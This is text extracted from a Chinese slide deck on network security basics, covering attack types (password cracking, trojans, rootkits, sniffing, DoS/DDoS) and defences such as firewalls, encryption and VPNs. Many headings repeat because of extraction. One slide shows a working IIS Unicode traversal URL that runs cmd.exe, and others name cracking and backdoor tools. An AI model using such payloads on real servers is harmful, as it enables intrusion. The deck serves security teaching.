资源描述
一、网络安全概述一、网络安全概述二、网络服务的安全问题二、网络服务的安全问题三、常见黑客攻击手段三、常见黑客攻击手段四、企业网中可以选择的安全技术四、企业网中可以选择的安全技术五、网络安全防范策略五、网络安全防范策略网络安全技术基础网络安全技术基础7/21/20247/21/2024一、网络安全概述7/21/20247/21/2024复杂程度复杂程度复杂程度复杂程度Internet EmailWeb 浏览Intranet 站点电子商务电子商务 电子政务电子政务电子交易电子交易时间时间INTERNET技术及应用的飞速发展7/21/20247/21/2024网络发展的现状不断增加的新应用不断加入的网络互联网的广泛应用人员安全意识不足7/21/20247/21/2024 网络的攻击事件报道(网络的攻击事件报道(1 1)据联邦调查局统计,美国每年因网络安全造成的损失高达75亿美元。据美国金融时报报道,世界上平均每20秒就发生一次入侵国际互联网络的计算机安全事件,三分之一的防火墙被突破。美国联邦调查局计算机犯罪组负责人吉姆塞特尔称:给我精选10名“黑客”,组成个小组,90天内我将使美国趴下。7/21/20247/21/2024 网络的攻击事件报道(网络的攻击事件报道(2 2)在海湾战争中,美国特工人员在安曼将伊拉克从德国进口的一批计算机打印设备中换上含有可控“计算机病毒”的芯片,导致伊方的计算机系统在战争初期就陷入全面瘫痪。美国已生产出第一代采用“病毒固化”技术的芯片,并开始嵌入出口的计算机产品中。一旦需要,便可遥控激活。2000年2月,Yahoo受到攻击。“黑客”所采用的攻击方法为分布式DoS攻击。2000年3月8日:山西日报国际互联网站遭到黑客数次攻击被迫关机,这是国内首例黑客攻击省级党报网站事件。2003年11月,Microsoft公司遭到来自俄罗斯的“黑客”袭击,据称造成部分源代码丢失。2003年著名的游戏公司Sierra开发的反恐精英2在未上市之前源代码被黑客从网路窃走。7/21/20247/21/20241980 1985 1990 1995 2001 2003时间(年)时间(年)高高各种攻击者的综合威胁各种攻击者的综合威胁程度程度低低对攻击者技术知识和技巧的对攻击者技术知识和技巧的要求要求黑客攻击越来越容易实现,威胁程度越来越高黑客攻击越来越容易实现,威胁程度越来越高信息网络系统的复杂性增加脆弱性程度网络系统日益复杂,网络系统日益复杂,安全隐患急剧增加安全隐患急剧增加网络的攻击事件报道(网络的攻击事件报道(3 3)7/21/20247/21/2024 网络存在的威胁网络存在的威胁操作系统本身的安全漏洞;防火墙存在安全缺陷和规则配置不合理;来自内部网用户的安全威胁;缺乏有效的手段监视、评估网络的安全性;TCP/IP协议族软件本身缺乏安全性;电子邮件病毒、Web页面中存在恶意的Java/ActiveX控件;应用服务的访问控制、安全设计存在漏洞。线路窃听。指利用通信介质的电磁泄漏或搭线窃听等手段获取非法信息。7/21/20247/21/2024信息安全的基本特征(信息安全的基本特征(1)相对性只有相对的安全,没有绝对的安全系统。操作系统与网络管理的相对性。安全性在系统的不同部件间可以转移(如在内部网络和外部网络之间使用堡垒主机)。7/21/20247/21/2024信息安全的基本特征(信息安全的基本特征(2)时效性新的漏洞与攻击方法不断发现(NT4.0已从SP1发展到SP6,Windows2000业发现很多漏洞,针对Outlook的病毒攻击非常普遍)配置相关性日常管理中的不同配置会引入新的问题(安全测评只证明特定环境与特定配置下的安全)新的系统部件会引入新的问题(新的设备的引入、防火墙配置的修改)7/21/20247/21/2024信息安全的基本特征(信息安全的基本特征(3)攻击的不确定性攻击发起的时间、攻击者、攻击目标和攻击发起的地点都具有不确定性复杂性:信息安全是一项系统工程,需要技术的和非技术的手段,涉及到安全管理、教育、培训、立法、国际合作与互不侵犯协定、应急反应等7/21/20247/21/2024网络安全层次网络安全层次层次一:物理环境的安全性(物理层安全)层次二:操作系统的安全性(系统层安全)层次三:网络的安全性(网络层安全)层次四:应用的安全性(应用层安全)层次五:管理的安全性(管理层安全)7/21/20247/21/2024存在安全漏洞原因网络设备种类繁多访问方式的多样化网络的不断变化用户安全专业知识的缺乏7/21/20247/21/2024网络服务的安全问题7/21/20247/21/2024电子邮件的安全问题电子邮件的安全问题UNIX平台上常用的邮件服务器sendmail常以root帐号运行,存在潜在的危险;角色欺骗:电子邮件上的地址是可以假冒的;窃听:电子邮件的题头和内容是用明文传送的,所以内容在传送过程中可能被他人偷看或修改;电子邮件炸弹:被攻击的计算机被电子邮件所淹没直到系统崩溃;针对电子邮件的病毒大量涌现。7/21/20247/21/2024FTPFTP文件传输的安全问题文件传输的安全问题多数FTP服务器可以用anonymous用户名登录,这样存在让用户破坏系统和文件可能。上载的软件可能有破坏性,大量上载的文件会耗费机时及磁盘空间。建立匿名服务器时,应当确保用户不能访问系统的重要部分,尤其是包含系统配置信息的文件目录。注意不要让用户获得SHELL级的用户访问权限。普通文件传输协议(TFTP)支持无认证操作,应屏蔽掉。7/21/20247/21/2024Telnet服务和服务和WWW的安全问题的安全问题Telnet登录时要输入帐号和密码,但帐号和密码是以明文方式传输的,易被监听到。SSH(SecureShell)Web浏览器和服务器难以保证安全。Web浏览器比FTP更易于传送和执行正常的程序,所以它也更易于传送和执行病毒程序。服务器端的安全问题主要来自于CGI(公共网关接口)程序,网上很多的CGI程序并不是由有经验、了解系统安全的程序员编写的,所以存在着大量的安全漏洞。JavaScript,JavaApplet,ActiveX都会带来安全问题7/21/20247/21/2024网络管理服务及网络管理服务及NFSNFS的安全问的安全问题题Ping、traceroute/tracert经常被用来测试网络上的计算机,以此作为攻击计算机的最初的手段。简单网络管理协议(SNMP)可以用来集中管理网络上的设备,SNMP的安全问题是别人可能控制并重新配置你的网络设备以达到危险的目的:取消数据包过滤功能、改变路径、废弃网络设备的配置文件等。NFS可以让你使用远程文件系统,不恰当的配置NFS,侵袭者可以很容易用NFS安装你的文件系统。NFS使用的是主机认证,黑客可以冒充合法的主机。7/21/20247/21/2024黑客常见攻击手段7/21/20247/21/2024主要内容日益增长的网络安全威胁状况常见的网络攻击方式解析口令攻击特洛伊木马网络监听sniffer扫描器病毒技术拒绝服务攻击(DDOS)7/21/20247/21/2024日益增长的网络安全威胁7/21/20247/21/2024日益增长的网络安全威胁日益增长的网络安全威胁 黑客和病毒技术的统一黑客和病毒技术的统一自动,智能,普及自动,智能,普及,分布分布,大范围大范围 黑客文化黑客文化:从个人目的到政治,社会,军事,工业等目的从个人目的到政治,社会,军事,工业等目的7/21/20247/21/2024网络网络内部、外部泄密内部、外部泄密拒绝服务攻击拒绝服务攻击逻辑炸弹逻辑炸弹特洛伊木马特洛伊木马黑客攻击黑客攻击计算机病毒计算机病毒信息丢失、信息丢失、篡改、销毁篡改、销毁蠕虫蠕虫常见的黑客攻击方式常见的黑客攻击方式7/21/20247/21/2024常见网络攻击方式常见网络攻击方式口令攻击特洛伊木马网络监听sniffer扫描器病毒技术拒绝服务攻击(DDOS)7/21/20247/21/2024口令攻击口令攻击口令攻击类型字典攻击强行攻击组合攻击其他攻击类型社会工程学偷窥搜索垃圾箱7/21/20247/21/2024实施入侵(9)口令攻击工具Windows下常见的工具下常见的工具lL0phtcrack lNTSweep lNTCrack lPWDump2lCainUnix下常见的工具下常见的工具lCracklJohn the Ripperl Slurpie 7/21/20247/21/2024特洛伊木马(1)特洛伊木马简单地说,特洛伊木马就是攻击者再次进入网络或者是系统而不被发现的隐蔽通道。7/21/20247/21/2024特洛伊木马(2)在大多数情况下,攻击者入侵一个系统后,他可能还想在适当的时候再次进入系统。比如说,如果攻击者入侵了一个站点,将它作为一个对其他系统进行攻击的平台或者是跳板,他就会想在适当的时候登录到这个站点取回他以前存放在系统里面的工具进行新的攻击。很容易想到的方法就是在这个已经被入侵的系统中留一个特洛依木马。7/21/20247/21/2024特洛伊木马(3)木马程序举例QAZQAZ是一个典型的通过电子邮件传送的特洛伊木马程序。它通常隐藏在notepad.exe程序中。木马监听代理木马监听程序在受害者系统中打开一个端口并且对所有试图与这个端口相连接的行为进行监听。当有人通过这个端口进行连接时,它要么运行一个三方程序,要么将命令发送给攻击者。NetcatTiniRootkit7/21/20247/21/2024特洛伊木马(4)关于RootkitRootkit对于UNIX系统来说是相当普遍的,NT系统的也有。和它的名字正好相反,这种工具并不能使我们获得ROOT权限,但是当一个攻击者已经获得了ROOT的身份后,它就能使攻击者在任何时候都可以以ROOT身份登录到系统。它们经常采用的方法是将自己隐藏在一些重要的文件里。Rootkit有两个主要的类型:文件级别系统级别7/21/20247/21/2024特洛伊木马(5)文件级别Rootkit威力很强大,可以轻而易举地在系统中建立后门。最一般的情况就是它们首先进入系统然后修改系统的重要文件来达到隐藏自己的目的。合法的文件被木马程序替代。通常情况下,合法的程序变成了外壳程序,而其内部就是隐藏着的后门程序。下面列出的程序就是经常被木马程序利用掩护自己的UNIXRootkit。LOGINLSPSFINDWHONETSTAT7/21/20247/21/2024特洛伊木马(6)系统级别(内核级)对于工作在文件级的Rootkit来说,它们非常容易被检测到。而内核级Rootkit工作在一个很低的级别上-内核级。它们经常依附在内核上,并没有修改系统的任何文件,于是tripwire工具就不能检测到它的使用。因为它并没有对系统的任何文件进行修改,攻击者可以对系统为所欲为而不被发现。系统级Rootkit为攻击者提供了很大的便利,并且修复了文件级Rootkit的一些错误。7/21/20247/21/2024特洛伊木马(7)Unix下常见的后门程序文件级RootkitTrojanITLrk5ArkRootkitTK内核级KnarkAdore7/21/20247/21/2024特洛伊木马(8)Windows下常见的后门程序BrownOrificeDonaldDickSubSevenBackOrifice广外女生黑暗天使冰河灰鸽子流莺7/21/20247/21/2024特洛伊木(9)木马的清除:TheCleaner杀毒软件手动清除木马的防范:不要下载和执行来历不明的程序7/21/20247/21/2024网络监听网络监听的作用:可以截获用户口令;可以截获用户口令;可以截获秘密的或专用的信息;可以截获秘密的或专用的信息;可以用来攻击相邻的网络;可以用来攻击相邻的网络;可以对数据包进行详细的分析;可以对数据包进行详细的分析;可以分析出目标主机采用了哪些协议可以分析出目标主机采用了哪些协议7/21/20247/21/2024常用网络监听工具常用网络监听工具工具名称操作系统功能简介SniffitSunOS,Solaris针对TCP/IP协议的不安全性进行监听TcpdumpUnix,FreeBSD可以从以太网上监听并截获数据包nfswatchHP/UX,SunOS监控在以太网上传输的NFS数据包ethermanSGIIrix监听以太网上的通信SnoopSunOS,Solaris用来侦听本网段数据包,常用作错误诊断NetstatUNIX、WinNT显示当前的TCP/IP连接和协议统计etherfindSunOS监听局域网上的通信的主机LanwatchDOS监听外部主机对本机的访问7/21/20247/21/2024扫描器定义:自动检测本地或远程主机安全弱点的程序功能:帮助发现弱点而不是用来攻击系统分类:本地扫描器和网络扫描器;端口扫描器和漏洞扫描器常见扫描器:如ISS(InternetSecurityScanner,Internet安全扫描程序),SATAN(SecurityAnalysisToolforAuditingNetworks,审计网络用的安全分析工具),NESSUS等可以对整个域或子网进行扫描并寻找安全上的漏洞这些程序能够针对不同系统的脆弱性确定其弱点。入侵者利用扫描收集来的信息去获得对目标系统的非法访问权。7/21/20247/21/2024国际互联网络服务器服务器防火墙其它网络广域网电话网企业网内域网互联网扫描器互联网扫描器7/21/20247/21/2024拒绝服务攻击拒绝服务攻击DoS攻击LANDTeardrop,SYNfloodICMP:smurfRouter:remotereset,UDPport7,Windows:Port135,137,139(OOB),terminalserverSolaris:Linux:其他.7/21/20247/21/2024攻击者攻击者攻击者攻击者172.18.1.1172.18.1.1InternetInternetCode目标目标目标目标204.241.161.12204.241.161.12欺骗性的欺骗性的欺骗性的欺骗性的 IPIP包包包包源地址源地址源地址源地址204.241.161.12204.241.161.12Port139Port139目的地址目的地址目的地址目的地址204.241.161.12204.241.161.12Port139Port139TCPOpenTCPOpenG.Mark Hardy拒绝服务攻击拒绝服务攻击:LAND LAND 攻击攻击7/21/20247/21/2024攻击者攻击者攻击者攻击者172.18.1.1172.18.1.1InternetInternetCode目标目标目标目标204.241.161.12204.241.161.12 IPIP包欺骗包欺骗包欺骗包欺骗源地址源地址源地址源地址204.241.161.12204.241.161.12Port139Port139目的地址目的地址目的地址目的地址204.241.161.12204.241.161.12Port139Port139包被送回它自己包被送回它自己包被送回它自己包被送回它自己崩溃G.Mark Hardy拒绝服务攻击拒绝服务攻击:LANDLAND 攻击攻击7/21/20247/21/2024攻击者攻击者攻击者攻击者172.18.1.1172.18.1.1InternetInternetCode目标目标目标目标204.241.161.12204.241.161.12IPIP包欺骗包欺骗包欺骗包欺骗源地址源地址源地址源地址 204.241.161.12Port139204.241.161.12Port139目标地址目标地址目标地址目标地址 204.241.161.12Port139204.241.161.12Port139TCPOpenTCPOpen防火墙防火墙防火墙防火墙防火墙把有危险的包防火墙把有危险的包防火墙把有危险的包防火墙把有危险的包阻隔在网络外阻隔在网络外阻隔在网络外阻隔在网络外G.Mark Hardy拒绝服务攻击拒绝服务攻击:代理防火墙的保护代理防火墙的保护7/21/20247/21/2024攻击者攻击者攻击者攻击者172.18.1.1172.18.1.1InternetInternetCode目标目标目标目标192.0.2.1192.0.2.1欺骗性的欺骗性的欺骗性的欺骗性的 IPIP包包包包源地址不存在源地址不存在源地址不存在源地址不存在目标地址是目标地址是目标地址是目标地址是 192.0.2.1192.0.2.1TCPOpenTCPOpenG.Mark Hardy拒绝服务攻击拒绝服务攻击:SYN FLOODSYN FLOOD7/21/20247/21/2024攻击者攻击者攻击者攻击者172.18.1.1172.18.1.1InternetInternetCode目标目标目标目标192.0.2.1192.0.2.1同步应答响应同步应答响应同步应答响应同步应答响应源地址源地址源地址源地址 192.0.2.1192.0.2.1目标地址不存在目标地址不存在目标地址不存在目标地址不存在TCPACKTCPACK崩溃G.Mark Hardy拒绝服务攻击拒绝服务攻击:SYNFLOOD7/21/20247/21/2024SmuffSmuff攻击示意图攻击示意图攻击示意图攻击示意图第一步:攻击者向被利用网络第一步:攻击者向被利用网络A的的广播地址发送一个广播地址发送一个ICMP 协议的协议的echo请求数据报,该数据报源请求数据报,该数据报源地址被伪造成地址被伪造成10.254.8.9第二步:网络第二步:网络A上的上的所有主机都向该伪造所有主机都向该伪造的源地址返回一个的源地址返回一个echo响应,造成响应,造成该主机服务中断。该主机服务中断。拒绝服务攻击拒绝服务攻击:Smurf7/21/20247/21/2024分布式拒绝服务分布式拒绝服务(DDOSDDOS)以破坏系统或网络的可用性为目标常用的工具:Trin00,TFN/TFN2K,Stacheldraht很难防范伪造源地址,流量加密,因此很难跟踪clienttargethandler.agent.DoSICMP Flood/SYN Flood/UDP Flood7/21/20247/21/2024DDoS的结构7/21/20247/21/2024分布式拒绝服务攻击步骤分布式拒绝服务攻击步骤(1 1)ScanningProgram不安全的计算机不安全的计算机Hacker攻击者使用扫描工具攻击者使用扫描工具探测扫描大量主机以探测扫描大量主机以寻找潜在入侵目标。寻找潜在入侵目标。1Internet7/21/20247/21/2024Hacker被控制的计算机被控制的计算机(代理端代理端)黑客设法入侵有安全漏洞黑客设法入侵有安全漏洞的主机并获取控制权。这的主机并获取控制权。这些主机将被用于放置后门、些主机将被用于放置后门、sniffer或守护程序甚至是或守护程序甚至是客户程序。客户程序。2Internet分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(2 2)7/21/20247/21/2024Hacker 黑客在得到入侵计算机黑客在得到入侵计算机清单后,从中选出满足建清单后,从中选出满足建立网络所需要的主机,放立网络所需要的主机,放置已编译好的守护程序,置已编译好的守护程序,并对被控制的计算机发送并对被控制的计算机发送命令。命令。3被控制计算机(代理端)被控制计算机(代理端)MasterServerInternet分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(3 3)7/21/20247/21/2024Hacker Using Client program,黑客发送控制命令给主机,黑客发送控制命令给主机,准备启动对目标系统的攻击准备启动对目标系统的攻击4被控制计算机(代理端)被控制计算机(代理端)TargetedSystemMasterServer分布式拒绝服务攻击步骤分布式拒绝服务攻击步骤分布式拒绝服务攻击步骤分布式拒绝服务攻击步骤4 4Internet分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(4 4)7/21/20247/21/2024InternetHacker 主机发送攻击信号给被控主机发送攻击信号给被控制计算机开始对目标系统制计算机开始对目标系统发起攻击。发起攻击。5MasterServerTargeted System被控制计算机(代理端)被控制计算机(代理端)分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(5 5)7/21/20247/21/2024TargetedSystemHacker 目标系统被无数的目标系统被无数的伪造的请求所淹没,伪造的请求所淹没,从而无法对合法用户从而无法对合法用户进行响应,进行响应,DDOS攻攻击成功。击成功。6MasterServerUserRequest DeniedInternet被控制计算机(代理端)被控制计算机(代理端)分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(6 6)7/21/20247/21/2024DDOS攻击的效果由于整个过程是自动化的,攻击者能够在5秒钟内入侵一台主机并安装攻击工具。也就是说,在短短的一小时内可以入侵数千台主机。并使某一台主机可能要遭受1000MB/S数据量的猛烈攻击,这一数据量相当于1.04亿人同时拨打某公司的一部电话号码。分布式拒绝服务攻击分布式拒绝服务攻击7/21/20247/21/2024分布式拒绝服务攻击的今后的发展趋势:如何增强自身的隐蔽性和攻击能力;采用加密通讯通道、ICMP协议等方法避开防火墙的检测;采用对自身进行数字签名等方法研究自毁机制,在被非攻击者自己使用时自行消毁拒绝服务攻击数据包,以消除证据。分布式拒绝服务攻击的发展趋势分布式拒绝服务攻击的发展趋势7/21/20247/21/2024预防DDOS攻击的措施确保主机不被入侵且是安全的;确保主机不被入侵且是安全的;周期性审核系统;周期性审核系统;检查文件完整性;检查文件完整性;优化路由和网络结构;优化路由和网络结构;优化对外开放访问的主机;优化对外开放访问的主机;在网络上建立一个过滤器(在网络上建立一个过滤器(filter)或侦测器或侦测器(sniffer),),在攻击信息到达网站服务器之前阻挡攻击在攻击信息到达网站服务器之前阻挡攻击信息。信息。预防预防DDOS攻击的措施攻击的措施7/21/20247/21/2024计算机病毒计算机病毒带来的危害2003年,计算机病毒不仅导致人们支付了数十亿美元的费用,而且还动摇了互联网的中枢神经。从今年1月份的Slammer攻击事件到8月份的“冲击波”病毒,都给互联网带来了不小的破坏。2004年上半年又出现将近4000种病毒目前世界上共有8万多种病毒,但是大部分都为“动物园”里的老病毒,这些病毒很少传播,还在“野外”的病毒有2000多种,较为流行的病毒有200多种,其中以蠕虫病毒传播最为广泛。7/21/20247/21/2024中文IIS4.0+SP6中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,UNICODE编码存在BUG,在UNICODE编码中%c1%1c-(0 xc1-0 xc0)*0 x40+0 x1c=0 x5c=/%c0%2f-(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=NT4中/编码为%c1%9c在英文版里:WIN2000英文版%c0%af还有以下的编码可以实现对该漏洞的检测.%c1%pc%c0%9v%c0%qf%c1%8shttp:/192.168.100.227/scripts/.%c1%1c.%c1%1cwinnt/system32/cmd.exe?/c+dirc:黑客攻击范例黑客攻击范例UNICODE漏洞的利用漏洞的利用7/21/20247/21/2024黑客攻击范例UNICODE漏洞的利用7/21/20247/21/2024黑客攻击范例UNICODE漏洞的利用7/21/20247/21/2024企业网中可以选择的安全技术7/21/20247/21/2024主要内容防火墙技术加密技术VPN技术入侵检测技术防病毒技术网络扫描技术7/21/20247/21/2024ServerClient防火墙(Firewall)注解:防火墙类似一堵城墙,将服务器与客户主机进行物理隔注解:防火墙类似一堵城墙,将服务器与客户主机进行物理隔离,并在此基础上实现服务器与客户主机之间的授权互访、互离,并在此基础上实现服务器与客户主机之间的授权互访、互通等功能。通等功能。防火墙是一个位于计算机与网络或网络与网络之间的软件或硬件设备或是软硬件结合7/21/20247/21/2024一种高级访问控制设备,置于不同一种高级访问控制设备,置于不同一种高级访问控制设备,置于不同一种高级访问控制设备,置于不同网络安全域网络安全域网络安全域网络安全域之间的一系列部件的组合,它是不同之间的一系列部件的组合,它是不同之间的一系列部件的组合,它是不同之间的一系列部件的组合,它是不同网络安全域间通信流的网络安全域间通信流的网络安全域间通信流的网络安全域间通信流的唯一通道唯一通道唯一通道唯一通道,能根据企业有关的安全政策,能根据企业有关的安全政策,能根据企业有关的安全政策,能根据企业有关的安全政策控制控制控制控制(允许、拒绝、(允许、拒绝、(允许、拒绝、(允许、拒绝、监视、记录)进出网络的访问行为。监视、记录)进出网络的访问行为。监视、记录)进出网络的访问行为。监视、记录)进出网络的访问行为。两个安全域之间通两个安全域之间通信流的唯一通道信流的唯一通道安全域1Host A Host B 安全域2Host C Host D UDPBlockHostCHostBTCPPassHostCHostADestinationProtocolPermitSource根据访问控制规则决定根据访问控制规则决定进出网络的行为进出网络的行为防防 火火 墙墙7/21/20247/21/2024防火墙的目的防火墙的目的确保内部网向外部网的全功能互联和内部网的安全;所有内部网络与外部网的信息交流必须经过防火墙;只有按本地的安全策略被授权的信息才允许通过;防火墙本身具有防止被穿透的能力。7/21/20247/21/2024防火墙的作用防火墙的作用过滤进出网络的数据包管理进出网络的访问行为封堵某些禁止的访问行为记录通过防火墙的信息内容和活动对网络攻击进行检测和告警 7/21/20247/21/2024防火墙结构防火墙结构双主机防火墙主机屏蔽防火墙子网屏蔽防火墙7/21/20247/21/2024双主机防火墙你的网络internet双网卡主机双网卡主机1、必须使主机的路由功能无效。2、双主机防火墙是运行一组应用层代理软件或链路层 代理软件来工作的缺点:用户很容易意外地使内部路由有效7/21/20247/21/2024主机屏蔽防火墙你的网络internet路由器路由器主机屏蔽防火墙主机屏蔽防火墙7/21/20247/21/2024子网屏蔽防火墙你的网络internet路由器路由器子子网屏蔽防火墙网屏蔽防火墙路由器路由器7/21/20247/21/2024防火墙技术防火墙技术包过滤技术代理技术状态检查技术地址翻译技术安全审计技术安全内核技术负载平衡技术内容安全技术7/21/20247/21/2024防防 火火 墙的局限墙的局限%c1%1c%c1%1cDir c:7/21/20247/21/2024防防 火火 墙的局限墙的局限确保网络的安全确保网络的安全,就要对网络内部进行实时的就要对网络内部进行实时的检测检测 ,这就需要这就需要IDSIDS无时不在的防护!无时不在的防护!防火墙不能防止通向站点的后门。防火墙一般不提供对内部的保护。防火墙无法防范数据驱动型的攻击。防火墙不能防止用户由Internet上下载被病毒感染的计算机程序或者将该类程序附在电子邮件上传输7/21/20247/21/2024数据加密技术数据加密技术加密系统的组成部分密码分类数字签名近代加密技术加密技术的实现PGP加密软件7/21/20247/21/2024加密系统的组成部分加密系统的组成部分(1)未加密的报文,也称明文。(2)加密后的报文,也称密文。(3)加密解密设备或算法。(4)加密解密的密钥密钥:是用户按照一种密码体制随机选取,它通常是一随机字符串,是控制明文和密文变换7/21/20247/21/2024密码分类密码分类按应用技术或历史发展阶段划分手工密码、机械密码、电子机内乱密码、计算机密码按保密程度划分理论上保密的密码、实际上保密的密码、不保密的密码按密钥方式划分对称密钥密码、非对称式密码按明文形态模拟型密码、数字型密码按编制原理划分移位、代替、置换7/21/20247/21/2024对称密钥加密技术对称密钥加密技术安全性依赖于:安全性依赖于:加密算法足够强,加密方法的安全性依赖于密钥的秘密性,而不是算法。特点:特点:(1)收发双方使用相同密钥 的密码(2)密钥的分发和管理非常复杂、代价昂贵。(3)不能实现数字签名用来加密大量的数据7/21/20247/21/2024公有密钥加密技术公有密钥加密技术加密关键性的、核心的机密数据加密系统的组成部分公有密钥和私有密钥的使用规则(1)密钥成对使用)密钥成对使用(2)公钥可以给任何人,而私钥自己保留)公钥可以给任何人,而私钥自己保留(3)从现实环境下,不可能从公有密钥推导出私有)从现实环境下,不可能从公有密钥推导出私有密钥密钥特点:(1)密钥的分配和管理简单。)密钥的分配和管理简单。(2)容易实现数字签名,最适合于电子商务应用。)容易实现数字签名,最适合于电子商务应用。(3)安全性更高,计算非常复杂,实现速度远赶不)安全性更高,计算非常复杂,实现速度远赶不上对称密钥加上对称密钥加密系统密系统7/21/20247/21/2024数字签名数字签名原理:将要传送的明文通过一种函数运算(HASH)转换成报文摘要,报文摘要加密后与明文一起传送给按受方,接受方将接受的明文产生新的报文摘要与发送方的发来的摘要解密比较,比较结果一致表示明文未被改动,如果不一致明文已篡改。7/21/20247/21/2024数字签名数字签名 7/21/20247/21/2024VPN即虚拟专用网,是指一些节点通过一个公用网络(通常是因特网)建立的一个临时的、安全的连接,它们之间的通信的机密性和完整性可以通过某些安全机制的实施得到保证特征虚拟(V):并不实际存在,而是利用现有网络,通过资源配置以及虚电路的建立而构成的虚拟网络专用(P):只有企业自己的用户才可以联入企业自己的网络网络(N):既可以让客户连接到公网所能够到达的任何地方,也可以方便地解决保密性、安全性、可管理性等问题,降低网络的使用成本VPNVPN技术技术7/21/20247/21/2024VPNVPN的用途的用途VPN(虚拟专用网络)是通过公共介质如Internet扩展公司的网络VPN可以加密传输的数据,保障数据的机密性、完整性、真实性防火墙是用来保证内部网络不被侵犯,相当于银行的门卫;而VPN则是保证在网络上传输的数据不被窃取,相当于运钞车。7/21/20247/21/2024VPNVPN的隧道协的隧道协议议 VPN的关键技术在于通信隧道的建立,数据包通过通信隧道进行封装后的传送以确保其机密性和完整性通常使用的方法有:使用点到点隧道协议PPTP、第二层隧道协议L2TP、第二层转发协议L2F等在数据链路层对数据实行封装使用IP安全协议IPSec在网络层实现数据封装使用介于第二层和第三层之间的隧道协议,如MPLS隧道协议7/21/20247/21/2024PPTP/L2TPPPTP/L2TP1996年,Microsoft和Ascend等在PPP协议的基础上开发了PPTP,并将它集成于WindowsNTServer4.0中,同时也提供了相应的客户端软件PPTP可把数据包封装在PPP包中,再将整个报文封装在PPTP隧道协议包中,最后,再嵌入IP报文或帧中继或ATM中进行传输PPTP提供流量控制,采用MPPE加密算法7/21/20247/21/20241996年,Cisco提出L2F(Layer2Forwarding)隧道协议1997年底,Micorosoft和Cisco公司把PPTP协议和L2F协议的优点结合在一起,形成了L2TP协议L2TP协议综合了PPTP协议和L2F(Layer2Forwarding)协议的优点,并且支持多路隧道,这样可以使用户同时访问Internet和企业网。L2TP可以实现和企业原有非IP网的兼容,支持MP(MultilinkProtocol),可以把多个物理通道捆绑为单一逻辑信道PPTP/L2TPPPTP/L2TP7/21/20247/21/2024优点:支持其他网络协议支持其他网络协议(如(如Novell的的IPX,NetBEUI和和AppleTalk协议协议)支持流量控制支持流量控制缺点:通道打开后,源和目的用户身份就不再进行认证,存在通道打开后,源和目的用户身份就不再进行认证,存在安全隐患安全隐患限制同时最多只能连接限制同时最多只能连接255个用户个用户端点用户需要在连接前手工建立加密信道,另外认证和端点用户需要在连接前手工建立加密信道,另外认证和加密受到限制,没有强加密和认证支持。加密受到限制,没有强加密和认证支持。PPTP和和L2TP最适合用于远程访问虚拟专用网。最适合用于远程访问虚拟专用网。PPTP/L2TP7/21/20247/21/2024IPSec IPSec VPNVPNIPSec是一种由IETF设计的端到端的确保基于IP通讯的数据安全性的机制。IPSEC支持对数据加密,同时确保数据的完整性。IPSEC使用验证包头(AH,在RFC2402中定义)提供来源验证(sourceauthentication),确保数据的可靠性;IPSec使用封装安全负载(ESP,在RFC1827中定义)进行加密,从而确保数据机密性。在IPSec协议下,只有发送方和接受方知道秘密密钥。如果验证数据有效,接受方就可以知道数据来自真实的发送方,并且在传输过程中没有受到破坏。IPSec有两种应用模式:传送模式和隧道模式7/21/20247/21/2024传输模式:使用原始明文IP头,并且只加密数据,包括它的TCP和UDP头。这种模式适用于小型网络和移动客户端。隧道模式:隧道模式处理整个IP数据包:包括全部TCP/IP或UDP/IP头和数据,它用自己的地址做为源地址加入到新的IP头。隧道模式被用在两端或是一端是安全网关的架构中,例如装有IPSec的防火墙。使用了隧道模式,防火墙内很多主机不需要安装IPSec也能安全地与外界通信,并且还可以提供更多的便利来隐藏内部服务器主机和客户机的地址。IPSec IPSec VPNVPN7/21/20247/21/2024优点:可提供高强度的安全性(数据加密和身份验证)对上层应用完全透明支持网络与网络、用户与用户、网络与用户多种应用模式缺点:只支持IP协议目前防火墙产品中集成的目前防火墙产品中集成的VPN多为使用多为使用IPSec协议协议,在,在中国其发展处于蓬勃状态。中国其发展处于蓬勃状态。IPSecVPN7/21/20247/21/2024MPLS VPNMPLS VPN 是在网络路由和交换设备上应用MPLS(MultiprotocolLabelSwitching)技术,简化核心路由器的路由选择方式,利用结合传统路由技术的标记交换实现的IP虚拟专用网络(IPVPN)MPLSVPN主要应用领域是用于建设全网状结构的数据专线,保证局域网互联的带宽与服务质量。总部与下面分支机构互联时,如果使用公网,则带宽、时延等很大程度上受公网的网络状况制约。而布署MPLSVPN后,可以保证网络服务质量,从而保证一些对时延敏感的应用稳定运行,如分布异地的实时交易系统、视频会议、IP电话等等。7/21/20247/21/2024与其他与其他VPNVPN协议的对比协议的对比L2TP、PPTP:主要用于客户端接入专用网络。本身的安全性比较弱,需要依靠IPSec来提供进一步的安全性。MPLS:能够提供与传统的ATM,FR同等的安全性,但本身没有加密,认证机制,对数据的机密性等保证需要依靠IPSec来进一步保证。IPSec是弥补其他VPN技术的安全性的有效保证。7/21/20247/21/202411001110011100111001010001010001000101001010100100101010010001001001000100100100000100000000010000001100111001110011100101000101000100010100101010010010101001000100100100010010010000010000000001000000明文明文加密加密加密加密解密解密解密解密明文明文明文明文密文密文密文密文#¥&(&(%#%#%$%&*(!%$%&*(!#$%*(_%$#$%*(_%$#$%*#$%*&*)%$#&*)%$#保证数据在传输保证数据在传输中的机密性中的机密性发起方发起方发起方发起方接受方接受方接受方接受方密文密文#¥&(&(%#%#%$%&*(!%$%&*(!#$%*(_%$#$%*(_%$#$%*#$%*&*)%$#&*)%$#1.1.支持支持IKEIKE密钥协商密钥协商2.2.密钥自动刷新密钥自动刷新3.3.128128位对称加密位对称加密4.4.10241024位非对称加密位非对称加密5.5.设备之间采用证书认证设备之间采用证书认证6.6.支持支持CACA认证认证VPNVPN的主要作用之一的主要作用之一7/21/20247/21/2024发起方发起方发起方发起方接受方接受方接受方接受方10010001100100010101001001010010100001001000010000001101000011011000101010001010100010101000101010010001100100010101001001010010100001001000010000001101000011011000101010001010HashHashHashHash100010101000101010010001100100010101001001010010100001001000010000001101000011011000101010001010是否一样?是否一样?是否一样?是否一样?验证数据来源的验证数据来源的完整性和真实性完整性和真实性1.1.支持透明模式支持透明模式2.2.支持路由模式支持路由模式VPNVPN的主要作用之二的主要作用之二